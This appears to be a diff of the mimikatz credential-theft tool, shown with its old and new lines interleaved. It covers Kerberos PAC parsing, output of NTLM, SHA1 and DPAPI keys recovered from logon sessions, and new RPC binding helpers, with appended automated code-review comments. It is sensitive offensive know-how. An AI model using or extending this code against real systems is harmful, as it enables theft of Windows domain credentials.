kull_m_string_wprintf_hex(start + dataOffset, (DWORD) nextOffset + kuhl_m_kerberos_pac_headers[i].FixedBeginSize, 1);
kprintf(L"\n");*/
}
if(id == kuhl_m_kerberos_pac_headers[i].ElementId)
{
//kull_m_string_wprintf_hex(start, 12, 1); kprintf(L"\n");
if(nextOffset)
return start + dataOffset;
else
return NULL;
}
start += dataOffset + nextOffset + kuhl_m_kerberos_pac_headers[i].FixedBeginSize;
if(modulo = ((ULONG_PTR) start % 4))
start += 4 - modulo;
}
}
return NULL;
}
void kuhl_m_kerberos_pac_ustring(LPCWCHAR prefix, PMARSHALL_UNICODE_STRING pString, PVOID base)
{
UNICODE_STRING s = {pString->Length, pString->MaximumLength, (PWSTR) kuhl_m_kerberos_pac_giveElementById(pString->ElementId, base)};
kprintf(L"%s (%2hu, %2hu, @ %08x) - %wZ\n", prefix, pString->Length, pString->MaximumLength, pString->ElementId, &s);
}
NTSTATUS kuhl_m_kerberos_pac_info(int argc, wchar_t * argv[])
{
PPACTYPE pacType;
DWORD pacLenght, i, j;
BYTE buffer[16] = {0};
PRPCE_KERB_VALIDATION_INFO pValInfo;
PKERB_VALIDATION_INFO pValInfo;
PPAC_SIGNATURE_DATA pSignatureData;
PPAC_CLIENT_INFO pClientInfo;
PGROUP_MEMBERSHIP pGroup;
PRPCE_KERB_EXTRA_SID pExtraSids;
PSID pSid;
PVOID base;
if(kull_m_file_readData(L"C:\\security\\mimikatz\\mimikatz\\bad.pac", (PBYTE *) &pacType, &pacLenght))
if(kull_m_file_readData(L"C:\\security\\bad.pac", (PBYTE *) &pacType, &pacLenght))
{
kprintf(L"version %u, nbBuffer = %u\n\n", pacType->Version, pacType->cBuffers);
@ -262,80 +142,61 @@ NTSTATUS kuhl_m_kerberos_pac_info(int argc, wchar_t * argv[])
switch(pacType->Buffers[i].ulType)
{
case PACINFO_TYPE_LOGON_INFO:
pValInfo = (PRPCE_KERB_VALIDATION_INFO) ((PBYTE) pacType + pacType->Buffers[i].Offset);
base = (PBYTE) &pValInfo->infos + sizeof(MARSHALL_KERB_VALIDATION_INFO);
kprintf(L"[%02u] %08x @ offset %016llx (%u)\n", i, pacType->Buffers[i].ulType, pacType->Buffers[i].Offset, pacType->Buffers[i].cbBufferSize);
kull_m_string_wprintf_hex((PBYTE) pacType + pacType->Buffers[i].Offset, pacType->Buffers[i].cbBufferSize, 1 | (16 << 16));
kprintf(L"\n");
kprintf(L"*** Validation Informations *** (%u)\n", pacType->Buffers[i].cbBufferSize);
kprintf(L"TypeHeader : version 0x%02x, endianness 0x%02x, length %hu (%u), filer %08x\n", pValInfo->typeHeader.Version, pValInfo->typeHeader.Endianness, pValInfo->typeHeader.CommonHeaderLength, sizeof(MARSHALL_KERB_VALIDATION_INFO), pValInfo->typeHeader.Filler);
kprintf(L"PrivateHeader : length %u, filer %08x\n", pValInfo->privateHeader.ObjectBufferLength, pValInfo->privateHeader.Filler);
kprintf(L"RootElementId : %08x\n\n", pValInfo->RootElementId);
kprintf(L"LogonTime %016llx - ", pValInfo->infos.LogonTime); kull_m_string_displayLocalFileTime(&pValInfo->infos.LogonTime); kprintf(L"\n");
kprintf(L"LogoffTime %016llx - ", pValInfo->infos.LogoffTime); kull_m_string_displayLocalFileTime(&pValInfo->infos.LogoffTime); kprintf(L"\n");
kprintf(L"KickOffTime %016llx - ", pValInfo->infos.KickOffTime); kull_m_string_displayLocalFileTime(&pValInfo->infos.KickOffTime); kprintf(L"\n");
kprintf(L"PasswordLastSet %016llx - ", pValInfo->infos.PasswordLastSet); kull_m_string_displayLocalFileTime(&pValInfo->infos.PasswordLastSet); kprintf(L"\n");
kprintf(L"PasswordCanChange %016llx - ", pValInfo->infos.PasswordCanChange); kull_m_string_displayLocalFileTime(&pValInfo->infos.PasswordCanChange); kprintf(L"\n");
kprintf(L"PasswordMustChange %016llx - ", pValInfo->infos.PasswordMustChange); kull_m_string_displayLocalFileTime(&pValInfo->infos.PasswordMustChange); kprintf(L"\n");
kprintf(L"\n");
kuhl_m_kerberos_pac_ustring(L"EffectiveName ", &pValInfo->infos.EffectiveName, base);
kuhl_m_kerberos_pac_ustring(L"FullName ", &pValInfo->infos.FullName, base);
kuhl_m_kerberos_pac_ustring(L"LogonScript ", &pValInfo->infos.LogonScript, base);
kuhl_m_kerberos_pac_ustring(L"ProfilePath ", &pValInfo->infos.ProfilePath, base);
kuhl_m_kerberos_pac_ustring(L"HomeDirectory ", &pValInfo->infos.HomeDirectory, base);
kuhl_m_kerberos_pac_ustring(L"HomeDirectoryDrive ", &pValInfo->infos.HomeDirectoryDrive, base);
kprintf(L"\n");
kprintf(L"LogonCount %hu\n", pValInfo->infos.LogonCount);
kprintf(L"BadPasswordCount %hu\n", pValInfo->infos.BadPasswordCount);
kprintf(L"\n");
kprintf(L"UserId %08x (%u)\n", pValInfo->infos.UserId, pValInfo->infos.UserId);
kprintf(L"PrimaryGroupId %08x (%u)\n", pValInfo->infos.PrimaryGroupId, pValInfo->infos.PrimaryGroupId);
kprintf(L"\n");
kprintf(L"GroupCount %u\n", pValInfo->infos.GroupCount);
pGroup = (PGROUP_MEMBERSHIP) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.GroupIds, base);
kprintf(L"GroupIds @ %08x\n * RID : ", pValInfo->infos.GroupIds);
for(j = 0; j < pValInfo->infos.GroupCount; j++)
kprintf(L"%u,", pGroup[j].RelativeId); //, pGroup[j].Attributes);
kprintf(L"\n\n");
kprintf(L"UserFlags %08x (%u)\n", pValInfo->infos.UserFlags, pValInfo->infos.UserFlags);
kprintf(L"UserSessionKey "); kull_m_string_wprintf_hex(pValInfo->infos.UserSessionKey.data, 16, 0); kprintf(L"\n");
kprintf(L"\n");
kuhl_m_kerberos_pac_ustring(L"LogonServer ", &pValInfo->infos.LogonServer, base);
kuhl_m_kerberos_pac_ustring(L"LogonDomainName ", &pValInfo->infos.LogonDomainName, base);
kprintf(L"\n");
pSid = (PSID) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.LogonDomainId, base);
kprintf(L"LogonDomainId @ %08x\n * SID : ", pValInfo->infos.LogonDomainId); kull_m_string_displaySID(pSid); kprintf(L"\n");
kprintf(L"\n");
kprintf(L"UserAccountControl %08x (%u)\n", pValInfo->infos.UserAccountControl, pValInfo->infos.UserAccountControl);
kprintf(L"SubAuthStatus %08x (%u)\n", pValInfo->infos.SubAuthStatus, pValInfo->infos.SubAuthStatus);
kprintf(L"\n");
kprintf(L"LastSuccessfulILogon %016llx\n", pValInfo->infos.LastSuccessfulILogon);
kprintf(L"LastFailedILogon %016llx\n", pValInfo->infos.LastFailedILogon);
kprintf(L"\n");
kprintf(L"FailedILogonCount %u\n", pValInfo->infos.FailedILogonCount);
kprintf(L"\n");
kprintf(L"SidCount %u\n", pValInfo->infos.SidCount);
kprintf(L"ExtraSids @ %08x\n", pValInfo->infos.ExtraSids);
pExtraSids = (PRPCE_KERB_EXTRA_SID) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.ExtraSids, base);
for(j = 0; j < pValInfo->infos.SidCount; j++)
{kull_m_string_wprintf_hex(pExtraSids, 64, 1);
pSid = (PSID) kuhl_m_kerberos_pac_giveElementById(pExtraSids[j].ExtraSid, base);
kprintf(L"ExtraSid [%u] @ %08x\n * SID : ", j, pExtraSids[j].ExtraSid); kull_m_string_displaySID(pSid); kprintf(L"\n");
if(kuhl_m_pac_DecodeValidationInformation((PBYTE) pacType + pacType->Buffers[i].Offset, pacType->Buffers[i].cbBufferSize, &pValInfo))
{
kprintf(L"LogonTime %016llx - ", pValInfo->LogonTime); kull_m_string_displayLocalFileTime(&pValInfo->LogonTime); kprintf(L"\n");
kprintf(L"LogoffTime %016llx - ", pValInfo->LogoffTime); kull_m_string_displayLocalFileTime(&pValInfo->LogoffTime); kprintf(L"\n");
kprintf(L"KickOffTime %016llx - ", pValInfo->KickOffTime); kull_m_string_displayLocalFileTime(&pValInfo->KickOffTime); kprintf(L"\n");
kprintf(L"PasswordLastSet %016llx - ", pValInfo->PasswordLastSet); kull_m_string_displayLocalFileTime(&pValInfo->PasswordLastSet); kprintf(L"\n");
kprintf(L"PasswordCanChange %016llx - ", pValInfo->PasswordCanChange); kull_m_string_displayLocalFileTime(&pValInfo->PasswordCanChange); kprintf(L"\n");
kprintf(L"PasswordMustChange %016llx - ", pValInfo->PasswordMustChange); kull_m_string_displayLocalFileTime(&pValInfo->PasswordMustChange); kprintf(L"\n");
kprintf(L"EffectiveName %wZ\n", &pValInfo->EffectiveName);
kprintf(L"FullName %wZ\n", &pValInfo->FullName);
kprintf(L"LogonScript %wZ\n", &pValInfo->LogonScript);
kprintf(L"ProfilePath %wZ\n", &pValInfo->ProfilePath);
kprintf(L"HomeDirectory %wZ\n", &pValInfo->HomeDirectory);
kprintf(L"HomeDirectoryDrive %wZ\n", &pValInfo->HomeDirectoryDrive);
kprintf(L"LogonCount %hu\n", pValInfo->LogonCount);
kprintf(L"BadPasswordCount %hu\n", pValInfo->BadPasswordCount);
kprintf(L"UserId %08x (%u)\n", pValInfo->UserId, pValInfo->UserId);
kprintf(L"PrimaryGroupId %08x (%u)\n", pValInfo->PrimaryGroupId, pValInfo->PrimaryGroupId);
kprintf(L"GroupCount %u\n", pValInfo->GroupCount);
kprintf(L"GroupIds ");
for(j = 0; j < pValInfo->GroupCount; j++)
kprintf(L"%u, ", pValInfo->GroupIds[j].RelativeId); //, pGroup[j].Attributes);
kprintf(L"\n");
kprintf(L"UserFlags %08x (%u)\n", pValInfo->UserFlags, pValInfo->UserFlags);
kprintf(L"UserSessionKey "); kull_m_string_wprintf_hex(pValInfo->UserSessionKey.data, 16, 0); kprintf(L"\n");
kprintf(L"LogonServer %wZ\n", &pValInfo->LogonServer);
kprintf(L"LogonDomainName %wZ\n", &pValInfo->LogonDomainName);
kprintf(L"LogonDomainId "); kull_m_string_displaySID(pValInfo->LogonDomainId); kprintf(L"\n");
kprintf(L"UserAccountControl %08x (%u)\n", pValInfo->UserAccountControl, pValInfo->UserAccountControl);
kprintf(L"SubAuthStatus %08x (%u)\n", pValInfo->SubAuthStatus, pValInfo->SubAuthStatus);
kprintf(L"LastSuccessfulILogon %016llx - ", pValInfo->LastSuccessfulILogon); kull_m_string_displayLocalFileTime(&pValInfo->LastSuccessfulILogon); kprintf(L"\n");
kprintf(L"LastFailedILogon %016llx - ", pValInfo->LastFailedILogon); kull_m_string_displayLocalFileTime(&pValInfo->LastFailedILogon); kprintf(L"\n");
kprintf(L"FailedILogonCount %08x (%u)\n", pValInfo->FailedILogonCount, pValInfo->FailedILogonCount);
kprintf(L"SidCount %u\n", pValInfo->SidCount);
kprintf(L"ExtraSids\n");
for(j = 0; j < pValInfo->SidCount; j++)
{
kprintf(L" ");
kull_m_string_displaySID(pValInfo->ExtraSids[j].Sid);
kprintf(L"\n");
}
kprintf(L"ResourceGroupDomainSid "); if(pValInfo->ResourceGroupDomainSid) kull_m_string_displaySID(pValInfo->ResourceGroupDomainSid); kprintf(L"\n");
kprintf(L"ResourceGroupCount %u\n", pValInfo->ResourceGroupCount);
kprintf(L"ResourceGroupIds ");
for(j = 0; j < pValInfo->ResourceGroupCount; j++)
kprintf(L"%u, ", pValInfo->ResourceGroupIds[j].RelativeId); //, pGroup[j].Attributes);
kuhl_m_pac_FreeValidationInformation(&pValInfo);
kprintf(L"\n");
}
kprintf(L"\n");
pSid = (PSID) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.ResourceGroupDomainSid, base);
kprintf(L"ResourceGroupDomainSid @ %08x\n * SID : ", pValInfo->infos.ResourceGroupDomainSid); if(pSid) kull_m_string_displaySID(pSid); kprintf(L"\n");
kprintf(L"ResourceGroupCount %u\n", pValInfo->infos.ResourceGroupCount);
pGroup = (PGROUP_MEMBERSHIP) kuhl_m_kerberos_pac_giveElementById(pValInfo->infos.ResourceGroupIds, base);
kprintf(L"ResourceGroupIds @ %08x\n * RID : ", pValInfo->infos.ResourceGroupIds);
for(j = 0; j < pValInfo->infos.ResourceGroupCount; j++)
kprintf(L"%u,", pGroup[j].RelativeId); //, pGroup[j].Attributes);
break;
case PACINFO_TYPE_CHECKSUM_SRV: // Server Signature
case PACINFO_TYPE_CHECKSUM_KDC: // KDC Signature
pSignatureData = (PPAC_SIGNATURE_DATA) ((PBYTE) pacType + pacType->Buffers[i].Offset);
kprintf(L"*** %s Signature ***\n", (pacType->Buffers[i].ulType == 0x00000006) ? L"Server" : L"KDC");
kprintf(L"*** %s Signature ***\n", (pacType->Buffers[i].ulType == PACINFO_TYPE_CHECKSUM_SRV) ? L"Server" : L"KDC");
kprintf(L"Type %08x - (%hu) : ", pSignatureData->SignatureType, 0);//pSignatureData->RODCIdentifier);
kull_m_string_wprintf_hex(pSignatureData->Signature, (pSignatureData->SignatureType == KERB_CHECKSUM_HMAC_MD5) ? LM_NTLM_HASH_LENGTH : 12, 0);
kprintf(L"\n");


@ -7,8 +7,7 @@
#include "../kuhl_m.h"
#include "../modules/kull_m_file.h"
#include "../modules/kull_m_crypto_system.h"
#include "../modules/kull_m_rpce.h"
#include "../modules/kull_m_rpc_ms-pac.h"
#include "../modules/rpc/kull_m_rpc_pac.h"
#define KERB_NON_KERB_SALT 16
#define KERB_NON_KERB_CKSUM_SALT 17
@ -46,20 +45,9 @@ typedef struct _PAC_CLIENT_INFO {
} PAC_CLIENT_INFO, *PPAC_CLIENT_INFO;
BOOL kuhl_m_pac_validationInfo_to_PAC(PKERB_VALIDATION_INFO validationInfo, DWORD SignatureType, PPACTYPE *pacType, DWORD *pacLength);
BOOL kuhl_m_pac_validationInfo_to_LOGON_INFO(PKERB_VALIDATION_INFO validationInfo, PVOID *rpceValidationInfo, DWORD *rpceValidationInfoLength);
BOOL kuhl_m_pac_validationInfo_to_CNAME_TINFO(PKERB_VALIDATION_INFO validationInfo, PPAC_CLIENT_INFO *pacClientInfo, DWORD *pacClientInfoLength);
NTSTATUS kuhl_m_pac_signature(PPACTYPE pacType, DWORD pacLenght, DWORD SignatureType, LPCVOID key, DWORD keySize);
#ifdef KERBEROS_TOOLS
typedef struct _RPCE_LAZY_ELEMENT_HEADER {
RPCEID ElementId;
ULONG32 ElementSize;
ULONG32 FixedBeginSize;
BOOL isBuffer;
} RPCE_LAZY_ELEMENT_HEADER, PRPCE_LAZY_ELEMENT_HEADER;
PVOID kuhl_m_kerberos_pac_giveElementById(RPCEID id, LPCVOID base);
void kuhl_m_kerberos_pac_ustring(LPCWCHAR prefix, PMARSHALL_UNICODE_STRING pString, PVOID base);
NTSTATUS kuhl_m_kerberos_pac_info(int argc, wchar_t * argv[]);
#endif


@ -15,7 +15,7 @@
#include "../modules/kull_m_string.h"
#include "../modules/kull_m_samlib.h"
#include "../modules/kull_m_net.h"
#include "../modules/kull_m_rpc_drsr.h"
#include "../modules/rpc/kull_m_rpc_drsr.h"
#include "kuhl_m_lsadump_remote.h"
#include "kuhl_m_crypto.h"
#include "dpapi/kuhl_m_dpapi_oe.h"


@ -7,7 +7,7 @@
#include "globals.h"
#include "../modules/kull_m_patch.h"
#include "../modules/kull_m_process.h"
#include "../modules/kull_m_rpce.h"
#include "../modules/rpc/kull_m_rpc.h"
#include "../dpapi/kuhl_m_dpapi_oe.h"
typedef struct _RTL_BALANCED_LINKS {


@ -1091,35 +1091,33 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
VOID kuhl_m_sekurlsa_genericKeyOutput(PMARSHALL_KEY key, PVOID * dirtyBase, LPCWSTR sid)
{
PBYTE addr = (PBYTE) *dirtyBase + sizeof(ULONG);
if(key && key->unkId)
if(key)
{
switch(key->unkId)
switch(key->type)
{
case 0x00010002:
case 0x00010003:
case CREDENTIALS_KEY_TYPE_NTLM:
kprintf(L"\n\t * NTLM : ");
if(sid)
kuhl_m_dpapi_oe_credential_add(sid, NULL, addr, NULL, NULL, NULL);
break;
case 0x00020002:
case CREDENTIALS_KEY_TYPE_SHA1:
kprintf(L"\n\t * SHA1 : ");
if(sid)
kuhl_m_dpapi_oe_credential_add(sid, NULL, NULL, addr, NULL, NULL);
break;
case 0x00030002:
case 0x00030003:
case CREDENTIALS_KEY_TYPE_ROOTKEY:
kprintf(L"\n\t * RootKey : ");
break;
case 0x00040002:
case CREDENTIALS_KEY_TYPE_DPAPI_PROTECTION:
case 0x00040003:
kprintf(L"\n\t * DPAPI : ");
if(sid)
kuhl_m_dpapi_oe_credential_add(sid, NULL, NULL, NULL, addr, NULL);
break;
default:
kprintf(L"\n\t * %08x : ", key->unkId);
kprintf(L"\n\t * %08x : ", key->type);
}
kull_m_string_wprintf_hex(addr, key->length, 0);
kull_m_string_wprintf_hex(addr, key->size, 0);
*dirtyBase = addr + *(PULONG) *dirtyBase;
}
}
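Review bot: `case 0x00040003:` left under `CREDENTIALS_KEY_TYPE_DPAPI_PROTECTION` is now dead code: the switch is on `key->type`, which the reworked `MARSHALL_KEY` on this page declares as a `WORD`, so a 32-bit case label can never match and this remnant of the old `unkId` encoding should be removed (the kd copy of `kuhl_m_sekurlsa_genericKeyOutput` in the later hunk already drops both `0x0004000x` labels). Relaxing the guard from `if(key && key->unkId)` to `if(key)` also changes behaviour for an all-zero key: it now reaches `default`, prints `00000000` and dumps `key->size` bytes — if that is intended a comment saying so would help, otherwise `if(key && key->type)` keeps the previous semantics. `key->size` is taken from the marshalled key and is not checked here; if the caller bounds it, a one-line comment stating that would save the next reader the search.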


@ -65,10 +65,18 @@ typedef struct _MSV1_0_PRIMARY_HELPER {
LONG offsetToIso;
} MSV1_0_PRIMARY_HELPER, *PMSV1_0_PRIMARY_HELPER;
typedef enum _KIWI_CREDENTIALS_KEY_TYPE {
CREDENTIALS_KEY_TYPE_NTLM = 1,
CREDENTIALS_KEY_TYPE_SHA1 = 2,
CREDENTIALS_KEY_TYPE_ROOTKEY = 3,
CREDENTIALS_KEY_TYPE_DPAPI_PROTECTION = 4,
} KIWI_CREDENTIALS_KEY_TYPE;
typedef struct _MARSHALL_KEY {
DWORD unkId;
USHORT unk0;
USHORT length;
WORD unk0;
WORD type;
WORD iterations;
WORD size;
RPCEID ElementId;
} MARSHALL_KEY, *PMARSHALL_KEY;
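Review bot: The reworked `MARSHALL_KEY` layout is undocumented; the former `DWORD unkId` is now read as `WORD unk0; WORD type;`, which matches the old switch labels (`0x00010002`/`0x00010003` → `type` 1, i.e. `CREDENTIALS_KEY_TYPE_NTLM`, with the low word landing in `unk0`) — a comment on the struct such as `// low WORD of the former unkId is unk0, high WORD is type (KIWI_CREDENTIALS_KEY_TYPE)` would record the derivation. `iterations` is a new field name with no use visible on this page; note where the meaning was derived from, or mark it `// unverified` if it is a guess. The identical enum and struct are added again in the kd header hunk below; if both trees must stay in sync, a cross-reference comment in each would help.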


@ -88,10 +88,18 @@ typedef struct _RPCE_PRIVATE_HEADER {
typedef ULONG32 RPCEID;
typedef enum _KIWI_CREDENTIALS_KEY_TYPE {
CREDENTIALS_KEY_TYPE_NTLM = 1,
CREDENTIALS_KEY_TYPE_SHA1 = 2,
CREDENTIALS_KEY_TYPE_ROOTKEY = 3,
CREDENTIALS_KEY_TYPE_DPAPI_PROTECTION = 4,
} KIWI_CREDENTIALS_KEY_TYPE;
typedef struct _MARSHALL_KEY {
DWORD unkId;
USHORT unk0;
USHORT length;
WORD unk0;
WORD type;
WORD iterations;
WORD size;
RPCEID ElementId;
} MARSHALL_KEY, *PMARSHALL_KEY;


@ -398,27 +398,24 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
VOID kuhl_m_sekurlsa_genericKeyOutput(PMARSHALL_KEY key, PVOID * dirtyBase)
{
switch(key->unkId)
switch(key->type)
{
case 0x00010002:
case 0x00010003:
case CREDENTIALS_KEY_TYPE_NTLM:
dprintf("\n\t * NTLM : ");
break;
case 0x00020002:
case CREDENTIALS_KEY_TYPE_SHA1:
dprintf("\n\t * SHA1 : ");
break;
case 0x00030002:
case 0x00030003:
case CREDENTIALS_KEY_TYPE_ROOTKEY:
dprintf("\n\t * RootKey : ");
break;
case 0x00040002:
case 0x00040003:
case CREDENTIALS_KEY_TYPE_DPAPI_PROTECTION:
dprintf("\n\t * DPAPI : ");
break;
default:
dprintf("\n\t * %08x : ", key->unkId);
dprintf("\n\t * %08x : ", key->type);
}
kull_m_string_dprintf_hex((PBYTE) *dirtyBase + sizeof(ULONG), key->length, 0);
kull_m_string_dprintf_hex((PBYTE) *dirtyBase + sizeof(ULONG), key->size, 0);
*dirtyBase = (PBYTE) *dirtyBase + sizeof(ULONG) + *(PULONG) *dirtyBase;
}


@ -9,7 +9,7 @@
#include "kull_m_crypto_system.h"
#include "kull_m_string.h"
#include "kull_m_net.h"
#include "kull_m_rpc_bkrp.h"
#include "rpc/kull_m_rpc_bkrp.h"
const GUID KULL_M_DPAPI_GUID_PROVIDER;

92
modules/rpc/kull_m_rpc.c Normal file

@ -0,0 +1,92 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kull_m_rpc.h"
BOOL kull_m_rpc_createBinding(LPCWSTR ProtSeq, LPCWSTR NetworkAddr, LPCWSTR Endpoint, LPCWSTR Service, DWORD ImpersonationType, RPC_BINDING_HANDLE *hBinding, void (RPC_ENTRY * RpcSecurityCallback)(void *))
{
BOOL status = FALSE;
RPC_STATUS rpcStatus;
RPC_WSTR StringBinding = NULL;
RPC_SECURITY_QOS SecurityQOS = {RPC_C_SECURITY_QOS_VERSION, RPC_C_QOS_CAPABILITIES_MUTUAL_AUTH, RPC_C_QOS_IDENTITY_STATIC, ImpersonationType};
LPWSTR fullServer;
DWORD szServer = (DWORD) (wcslen(NetworkAddr) * sizeof(wchar_t)), szPrefix = (DWORD) (wcslen(Service) * sizeof(wchar_t));
*hBinding = NULL;
rpcStatus = RpcStringBindingCompose(NULL, (RPC_WSTR) ProtSeq, (RPC_WSTR) NetworkAddr, (RPC_WSTR) Endpoint, NULL, &StringBinding);
if(rpcStatus == RPC_S_OK)
{
rpcStatus = RpcBindingFromStringBinding(StringBinding, hBinding);
if(rpcStatus == RPC_S_OK)
{
if(*hBinding)
{
if(fullServer = (LPWSTR) LocalAlloc(LPTR, szPrefix + sizeof(wchar_t) + szServer + sizeof(wchar_t)))
{
RtlCopyMemory(fullServer, Service, szPrefix);
RtlCopyMemory((PBYTE) fullServer + szPrefix + sizeof(wchar_t), NetworkAddr, szServer);
((PBYTE) fullServer)[szPrefix] = L'/';
rpcStatus = RpcBindingSetAuthInfoEx(*hBinding, (RPC_WSTR) fullServer, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, (MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_BUILD_VISTA) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE, NULL, 0, &SecurityQOS);
if(rpcStatus == RPC_S_OK)
{
if(RpcSecurityCallback)
{
rpcStatus = RpcBindingSetOption(*hBinding, RPC_C_OPT_SECURITY_CALLBACK, (ULONG_PTR) RpcSecurityCallback);
status = (rpcStatus == RPC_S_OK);
if(!status)
PRINT_ERROR(L"RpcBindingSetOption: 0x%08x (%u)\n", rpcStatus, rpcStatus);
}
else status = TRUE;
}
else PRINT_ERROR(L"RpcBindingSetAuthInfoEx: 0x%08x (%u)\n", rpcStatus, rpcStatus);
LocalFree(fullServer);
}
}
else PRINT_ERROR(L"No Binding!\n");
}
else PRINT_ERROR(L"RpcBindingFromStringBinding: 0x%08x (%u)\n", rpcStatus, rpcStatus);
RpcStringFree(&StringBinding);
}
else PRINT_ERROR(L"RpcStringBindingCompose: 0x%08x (%u)\n", rpcStatus, rpcStatus);
return status;
}
BOOL kull_m_rpc_deleteBinding(RPC_BINDING_HANDLE *hBinding)
{
BOOL status = FALSE;
if(status = (RpcBindingFree(hBinding) == RPC_S_OK))
*hBinding = NULL;
return status;
}
void __RPC_FAR * __RPC_USER midl_user_allocate(size_t cBytes)
{
void __RPC_FAR * ptr = NULL;
if(ptr = malloc(cBytes))
RtlZeroMemory(ptr, cBytes);
return ptr;
}
void __RPC_USER midl_user_free(void __RPC_FAR * p)
{
free(p);
}
void __RPC_USER ReadFcn(void *State, char **pBuffer, unsigned int *pSize)
{
*pBuffer = (char *) ((PKULL_M_RPC_FCNSTRUCT) State)->addr;
((PKULL_M_RPC_FCNSTRUCT) State)->addr = *pBuffer + *pSize;
((PKULL_M_RPC_FCNSTRUCT) State)->size -= *pSize;
}
void __RPC_USER WriteFcn(void *State, char *Buffer, unsigned int Size)
{
;
}
void __RPC_USER AllocFcn (void *State, char **pBuffer, unsigned int *pSize)
{
; // ???
}
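Review bot: `ReadFcn` hands the NDR engine whatever size it asks for without checking that the remaining buffer holds it: `size -= *pSize` underflows and `addr` moves past the end of the encoded data, so a truncated or malformed encoded blob is decoded out of bounds. Guard it before the assignments with `if(((PKULL_M_RPC_FCNSTRUCT) State)->size < *pSize) RpcRaiseException(RPC_X_BAD_STUB_DATA);` so callers see an RPC exception instead of a wild read. Separately, `kull_m_rpc_createBinding` leaks the binding when a step after `RpcBindingFromStringBinding` fails (`LocalAlloc`, `RpcBindingSetAuthInfoEx`, `RpcBindingSetOption`): `*hBinding` stays set while `status` is FALSE and callers never free it; add `if(!status && *hBinding) { RpcBindingFree(hBinding); *hBinding = NULL; }` just before `RpcStringFree(&StringBinding);`. `WriteFcn` and `AllocFcn` are empty stubs; a comment such as `// decode-only handle: encoding through this state is unsupported` would make that intent explicit.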

60
modules/rpc/kull_m_rpc.h Normal file

@ -0,0 +1,60 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#pragma once
#include "globals.h"
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 475
#endif
#include <rpc.h>
#include <rpcndr.h>
#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif // __RPCNDR_H_VERSION__
#include "midles.h"
#include <string.h>
#include "kull_m_rpc_ms-dtyp.h"
BOOL kull_m_rpc_createBinding(LPCWSTR ProtSeq, LPCWSTR NetworkAddr, LPCWSTR Endpoint, LPCWSTR Service, DWORD ImpersonationType, RPC_BINDING_HANDLE *hBinding, void (RPC_ENTRY * RpcSecurityCallback)(void *));
BOOL kull_m_rpc_deleteBinding(RPC_BINDING_HANDLE *hBinding);
typedef struct _RPCE_COMMON_TYPE_HEADER {
UCHAR Version;
UCHAR Endianness;
USHORT CommonHeaderLength;
ULONG Filler;
} RPCE_COMMON_TYPE_HEADER, *PRPCE_COMMON_TYPE_HEADER;
typedef struct _RPCE_PRIVATE_HEADER {
ULONG ObjectBufferLength;
ULONG Filler;
} RPCE_PRIVATE_HEADER, *PRPCE_PRIVATE_HEADER;
typedef ULONG32 RPCEID;
typedef struct _KULL_M_RPC_FCNSTRUCT {
PVOID addr;
size_t size;
} KULL_M_RPC_FCNSTRUCT, *PKULL_M_RPC_FCNSTRUCT;
void __RPC_FAR * __RPC_USER midl_user_allocate(size_t cBytes);
void __RPC_USER midl_user_free(void __RPC_FAR * p);
void __RPC_USER ReadFcn(void *State, char **pBuffer, unsigned int *pSize);
void __RPC_USER WriteFcn(void *State, char *Buffer, unsigned int Size);
void __RPC_USER AllocFcn (void *State, char **pBuffer, unsigned int *pSize);
#define RPC_EXCEPTION (RpcExceptionCode() != STATUS_ACCESS_VIOLATION) && \
(RpcExceptionCode() != STATUS_DATATYPE_MISALIGNMENT) && \
(RpcExceptionCode() != STATUS_PRIVILEGED_INSTRUCTION) && \
(RpcExceptionCode() != STATUS_ILLEGAL_INSTRUCTION) && \
(RpcExceptionCode() != STATUS_BREAKPOINT) && \
(RpcExceptionCode() != STATUS_STACK_OVERFLOW) && \
(RpcExceptionCode() != STATUS_IN_PAGE_ERROR) && \
(RpcExceptionCode() != STATUS_ASSERTION_FAILURE) && \
(RpcExceptionCode() != STATUS_STACK_BUFFER_OVERRUN) && \
(RpcExceptionCode() != STATUS_GUARD_PAGE_VIOLATION)
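Review bot: `RPC_EXCEPTION` expands to an unparenthesized chain of `&&` terms; it works inside `RpcExcept(...)` today, but any use combined with another condition would mis-associate, so wrap the whole expansion in parentheses: `#define RPC_EXCEPTION ((RpcExceptionCode() != STATUS_ACCESS_VIOLATION) && \` … `(RpcExceptionCode() != STATUS_GUARD_PAGE_VIOLATION))`. A one-line comment above it stating the intent — `// RpcExcept filter: handle RPC faults, let genuine crashes (AV, stack overflow, ...) propagate` — would also help, since the list reads like a denylist of what is caught rather than what is let through. `KULL_M_RPC_FCNSTRUCT` and the `ReadFcn`/`WriteFcn`/`AllocFcn` trio carry no comment tying them to MIDL incremental pickling (presumably a `MesDecodeIncrementalHandleCreate` state); naming that use would make the header self-explanatory.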


@ -0,0 +1,65 @@
/* Benjamin DELPY `gentilkiwi`
http://blog.gentilkiwi.com
benjamin@gentilkiwi.com
Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kull_m_rpc_bkrp.h"
BOOL kull_m_rpc_bkrp_createBinding(LPCWSTR NetworkAddr, RPC_BINDING_HANDLE *hBinding)
{
BOOL status = FALSE;
LPWSTR szTmpDc = NULL;
if(!NetworkAddr)
if(kull_m_net_getDC(NULL, DS_WRITABLE_REQUIRED, &szTmpDc))
NetworkAddr = szTmpDc;
if(NetworkAddr)
